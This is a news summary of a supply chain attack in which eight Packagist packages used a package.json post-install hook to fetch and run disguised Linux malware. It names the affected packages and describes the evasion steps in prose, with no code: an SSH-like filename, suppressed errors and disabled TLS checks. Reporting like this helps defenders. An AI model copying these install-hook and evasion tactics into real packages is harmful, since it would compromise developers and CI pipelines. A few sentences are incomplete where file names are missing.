A sophisticated supply chain attack has compromised eight packages on Packagist, injecting malicious code designed to download and execute Linux malware. The attack cleverly targeted projects that bundle JavaScript build tooling with PHP code, exploiting lifecycle hooks that might be overlooked by security teams focused on PHP dependencies.

Key Takeaways

• Eight Packagist packages were infected with Linux malware.

• The malware was delivered via a post-installation script targeting package.json.

• A Linux binary was downloaded from a GitHub Releases URL and disguised as a system process.

• The attack affected both PHP and Node.js ecosystems, and even GitHub Actions workflows.

The Cross-Ecosystem Attack Vector

The attackers inserted malicious code not into the file, but into . This strategy targeted projects that include JavaScript build tools alongside PHP code. By placing the malicious script in , the attackers aimed to bypass security scans that primarily focus on PHP dependencies, leaving lifecycle hooks within JavaScript tooling vulnerable.

Malware Deployment and Evasion Tactics

Once an affected package was installed, a post-installation script would execute. This script was designed to download a Linux binary from a GitHub Releases URL. The downloaded malware was then saved to the directory, mimicking a legitimate SSH daemon file. Permissions were modified to make the binary executable, and it was run in the background. To further evade detection, the script suppressed error messages and disabled TLS verification during the download process, making it difficult for developers to spot any suspicious activity.

The affected packages and their versions include:

• moritz-sauer-13/silverstripe-cms-theme (dev-master)

• crosiersource/crosierlib-base (dev-master)

• devdojo/wave (dev-main)

• devdojo/genesis (dev-main)

• katanaui/katana (dev-main)

• elitedevsquad/sidecar-laravel (3.x-dev)

• r2luna/brain (dev-main)

• baskarcm/tzi-chat-ui (dev-main)

Broader Campaign and Detection

Analysis revealed that the same payload was referenced in hundreds of files across GitHub, suggesting a wider campaign. The malicious code was also found embedded in GitHub workflow files, indicating an attempt to compromise CI/CD pipelines in addition to local developer environments. Researchers at Socket.dev identified the campaign through their AI-powered scanner, which flagged suspicious binary download and background execution behaviors. While the affected packages have been removed from Packagist, the nature of branch-tracking versions means developers should also verify the integrity of upstream repositories.

Sources

• Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware, The Hacker News.

• Hackers Hide Linux Payload Under SSH-Like Filename During Package Installation, CyberSecurityNews.